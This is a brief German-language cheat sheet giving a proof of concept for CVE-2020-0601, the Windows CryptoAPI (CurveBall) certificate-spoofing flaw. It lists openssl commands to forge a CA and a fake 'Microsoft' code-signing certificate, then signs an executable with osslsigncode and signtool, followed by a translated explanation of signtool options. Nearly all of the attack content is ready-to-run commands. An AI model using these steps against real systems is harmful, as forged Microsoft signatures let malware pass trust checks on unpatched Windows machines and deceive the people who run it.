
PoC für CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall
Proof of Concept für CVE-2020-0601 – Windows CryptoAPI (Crypt32.dll) PoC: https://github.com/ollypwn/CurveBall
Auf Kali:
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out Microsoft.key
openssl req -new -key Microsoft.key -out Microsoft.csr -config openssl_cs.conf -reqexts v3_cs
openssl x509 -req -in Microsoft.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out Microsoft.crt -days 50000 -extfile openssl_cs.conf -extensions v3_cs
openssl pkcs12 -export -in Microsoft.crt -inkey Microsoft.key -certfile spoofed_ca.crt -name "Code Signing" -out Microsoft.p12
2. Datei signieren:
osslsigncode sign -pkcs12 Microsoft.p12 -n "Signed by DiDi" -pass 123 -in c1.exe -out c1_Microsoft_signed.exe

signtool sign /v /f Microsoft.p12 /tr http://timestamp.digicert.com /as /fd sha256 /p 123 c1.exe

*signtool.exe Globale Befehlsoptionen: /v Zeigt detaillierte Ausgabe an, unabhängig davon, ob der Befehl erfolgreich ausgeführt wurde, und zeigt Warnmeldungen an. sign Befehlsoptionen: /f Gibt das Signaturzertifikat in der Datei an. Wenn die Datei im PFX-Format (Personal Information Exchange) vorliegt und durch ein Kennwort geschützt ist, verwenden Sie die Option /p, um das Kennwort anzugeben. Wenn die Datei keinen privaten Schlüssel enthält, verwenden Sie die Optionen /csp und /kc, um den CSP und den Containernamen des privaten Schlüssels anzugeben. /tr Gibt die URL des RFC-3161-Zeitstempelservers an. Wenn diese Option (oder /t) nicht vorhanden ist, wird die signierte Datei nicht mit einem Zeitstempel versehen. Schlägt der Zeitstempelvorgang fehl, wird eine Warnung ausgegeben. Diese Option kann nicht mit der Option /t verwendet werden. /as Fügt diese Signatur hinzu. Wenn keine primäre Signatur vorhanden ist, wird diese Signatur stattdessen zur primären Signatur. /fd Gibt den Dateidigestalgorithmus an, der zum Erstellen der Dateisignatur verwendet werden soll. Der Standardwert ist SHA1. /p Gibt das Kennwort an, das beim Öffnen einer PFX-Datei verwendet werden soll. (Verwenden Sie die Option /f, um die PFX-Datei anzugeben.)